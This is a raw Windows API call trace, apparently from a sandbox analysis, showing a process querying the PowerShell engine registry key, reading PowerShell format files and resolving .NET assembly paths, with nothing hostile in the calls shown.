	[0592.318] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0592.318] CoTaskMemAlloc (cb=0x5a) returned 0x1b3e1b60
	[0592.318] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3e1b60, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0592.318] CoTaskMemFree (pv=0x1b3e1b60) 
	[0592.318] RegCloseKey (hKey=0x2f4) returned 0x0
	[0592.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.327] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x84a06302, Data2=0xbc1a, Data3=0x483f, Data4=([0]=0xa5, [1]=0x5b, [2]=0x4f, [3]=0xe1, [4]=0xe2, [5]=0xdb, [6]=0xf, [7]=0x6))) returned 0x0
	[0592.337] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x76175d, Data2=0x338b, Data3=0x4dc4, Data4=([0]=0xb4, [1]=0x6b, [2]=0x35, [3]=0xbd, [4]=0xe0, [5]=0xed, [6]=0xd5, [7]=0xc9))) returned 0x0
	[0592.339] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0592.340] GetFileType (hFile=0x2f4) returned 0x1
	[0592.340] SetErrorMode (uMode=0x1) returned 0x1
	[0592.340] GetFileType (hFile=0x2f4) returned 0x1
	[0592.340] ReadFile (in: hFile=0x2f4, lpBuffer=0x32e5680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32e5680*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.343] ReadFile (in: hFile=0x2f4, lpBuffer=0x32e5680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32e5680*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.344] ReadFile (in: hFile=0x2f4, lpBuffer=0x32e5680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32e5680*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.345] ReadFile (in: hFile=0x2f4, lpBuffer=0x32e5680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32e5680*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.345] ReadFile (in: hFile=0x2f4, lpBuffer=0x32e5680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32e5680*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.347] ReadFile (in: hFile=0x2f4, lpBuffer=0x32e5680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32e5680*, lpNumberOfBytesRead=0xccdb8*=0xfb2, lpOverlapped=0x0) returned 1
	[0592.347] ReadFile (in: hFile=0x2f4, lpBuffer=0x32e4d9a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32e4d9a*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0592.348] ReadFile (in: hFile=0x2f4, lpBuffer=0x32e5680, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32e5680*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0592.348] CloseHandle (hObject=0x2f4) returned 1
	[0592.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0592.348] SetErrorMode (uMode=0x1) returned 0x1
	[0592.348] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0592.349] SetErrorMode (uMode=0x1) returned 0x1
	[0592.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0592.349] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f4) returned 0x0
	[0592.349] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0592.349] CoTaskMemAlloc (cb=0x5a) returned 0x1b3e2110
	[0592.349] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3e2110, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0592.349] CoTaskMemFree (pv=0x1b3e2110) 
	[0592.349] RegCloseKey (hKey=0x2f4) returned 0x0
	[0592.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0592.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0592.353] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xcf227269, Data2=0xd283, Data3=0x421a, Data4=([0]=0x8f, [1]=0x8b, [2]=0xe9, [3]=0xc5, [4]=0x2e, [5]=0x6d, [6]=0x29, [7]=0xe7))) returned 0x0
	[0592.358] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x786260f3, Data2=0xb5bc, Data3=0x4a44, Data4=([0]=0xb8, [1]=0x61, [2]=0xdc, [3]=0x9a, [4]=0xf6, [5]=0x2, [6]=0x96, [7]=0x90))) returned 0x0
	[0592.359] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x49afe43c, Data2=0x4f0a, Data3=0x4bd2, Data4=([0]=0x8b, [1]=0xe9, [2]=0x6d, [3]=0x9b, [4]=0xdf, [5]=0x18, [6]=0x30, [7]=0xb7))) returned 0x0
	[0592.360] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x785b15af, Data2=0x72e, Data3=0x4ad9, Data4=([0]=0x8e, [1]=0x95, [2]=0x83, [3]=0x3, [4]=0x5f, [5]=0xcc, [6]=0x5b, [7]=0xb0))) returned 0x0
	[0592.360] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xd41662b7, Data2=0x926f, Data3=0x493a, Data4=([0]=0xa3, [1]=0xcd, [2]=0xe2, [3]=0x9f, [4]=0x9f, [5]=0x3d, [6]=0x8a, [7]=0xc8))) returned 0x0
	[0592.361] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x81772ea5, Data2=0xb49b, Data3=0x414e, Data4=([0]=0xac, [1]=0x76, [2]=0x79, [3]=0x64, [4]=0xad, [5]=0xaa, [6]=0x3a, [7]=0x12))) returned 0x0
	[0592.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.362] SetErrorMode (uMode=0x1) returned 0x1
	[0592.362] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0592.363] GetFileType (hFile=0x2f4) returned 0x1
	[0592.363] SetErrorMode (uMode=0x1) returned 0x1
	[0592.363] GetFileType (hFile=0x2f4) returned 0x1
	[0592.363] ReadFile (in: hFile=0x2f4, lpBuffer=0x33313e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x33313e0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.373] ReadFile (in: hFile=0x2f4, lpBuffer=0x33313e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x33313e0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.374] ReadFile (in: hFile=0x2f4, lpBuffer=0x33313e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x33313e0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.374] ReadFile (in: hFile=0x2f4, lpBuffer=0x33313e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x33313e0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.375] ReadFile (in: hFile=0x2f4, lpBuffer=0x33313e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x33313e0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.375] ReadFile (in: hFile=0x2f4, lpBuffer=0x33313e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x33313e0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.375] ReadFile (in: hFile=0x2f4, lpBuffer=0x33313e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x33313e0*, lpNumberOfBytesRead=0xccdb8*=0xaca, lpOverlapped=0x0) returned 1
	[0592.376] ReadFile (in: hFile=0x2f4, lpBuffer=0x3330a12, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x3330a12*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0592.376] ReadFile (in: hFile=0x2f4, lpBuffer=0x33313e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x33313e0*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0592.376] CloseHandle (hObject=0x2f4) returned 1
	[0592.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.376] SetErrorMode (uMode=0x1) returned 0x1
	[0592.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0592.376] SetErrorMode (uMode=0x1) returned 0x1
	[0592.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.376] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f4) returned 0x0
	[0592.377] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0592.377] CoTaskMemAlloc (cb=0x5a) returned 0x1b3e2110
	[0592.377] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3e2110, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0592.377] CoTaskMemFree (pv=0x1b3e2110) 
	[0592.377] RegCloseKey (hKey=0x2f4) returned 0x0
	[0592.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0592.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0593.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0593.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0593.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0593.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0595.641] VirtualQuery (in: lpAddress=0xcb8e0, lpBuffer=0xcc7a0, dwLength=0x30 | out: lpBuffer=0xcc7a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0595.642] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x9a78b401, Data2=0x77da, Data3=0x4122, Data4=([0]=0xa5, [1]=0x4f, [2]=0x3e, [3]=0x3e, [4]=0x28, [5]=0x37, [6]=0xe6, [7]=0x91))) returned 0x0
	[0596.575] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x31da049b, Data2=0x2be, Data3=0x45ee, Data4=([0]=0x84, [1]=0xa7, [2]=0x45, [3]=0x59, [4]=0x2d, [5]=0x0, [6]=0xde, [7]=0xe5))) returned 0x0
	[0596.575] VirtualQuery (in: lpAddress=0xcba90, lpBuffer=0xcc950, dwLength=0x30 | out: lpBuffer=0xcc950*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0596.577] VirtualQuery (in: lpAddress=0xcba90, lpBuffer=0xcc950, dwLength=0x30 | out: lpBuffer=0xcc950*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0596.578] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x2b3177b6, Data2=0x4af9, Data3=0x45b4, Data4=([0]=0xa3, [1]=0x2e, [2]=0xd3, [3]=0xf1, [4]=0xca, [5]=0xe3, [6]=0x3, [7]=0xf2))) returned 0x0
	[0596.582] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x3610aec, Data2=0x7061, Data3=0x4a07, Data4=([0]=0x90, [1]=0x6d, [2]=0x4b, [3]=0x3b, [4]=0xb, [5]=0x6a, [6]=0xed, [7]=0x27))) returned 0x0
	[0596.582] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0596.598] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0596.599] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x89944d7, Data2=0x62cf, Data3=0x4a62, Data4=([0]=0xb9, [1]=0x84, [2]=0x14, [3]=0xef, [4]=0x2c, [5]=0x6d, [6]=0x89, [7]=0x45))) returned 0x0
	[0596.600] VirtualQuery (in: lpAddress=0xcb350, lpBuffer=0xcc210, dwLength=0x30 | out: lpBuffer=0xcc210*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0596.601] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x7f713610, Data2=0x4c46, Data3=0x42d3, Data4=([0]=0x9a, [1]=0xf0, [2]=0x51, [3]=0x87, [4]=0xa4, [5]=0x2a, [6]=0x6b, [7]=0x75))) returned 0x0
	[0596.601] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x516a6c42, Data2=0x2af9, Data3=0x469e, Data4=([0]=0x86, [1]=0x73, [2]=0x52, [3]=0x3c, [4]=0xde, [5]=0x53, [6]=0x72, [7]=0x53))) returned 0x0
	[0596.601] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0596.602] GetFileType (hFile=0x2f0) returned 0x1
	[0596.602] SetErrorMode (uMode=0x1) returned 0x1
	[0596.602] GetFileType (hFile=0x2f0) returned 0x1
	[0596.602] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.604] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.604] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.605] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.605] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.605] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.605] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.605] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.606] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.607] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.607] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.607] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.607] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.607] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.607] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
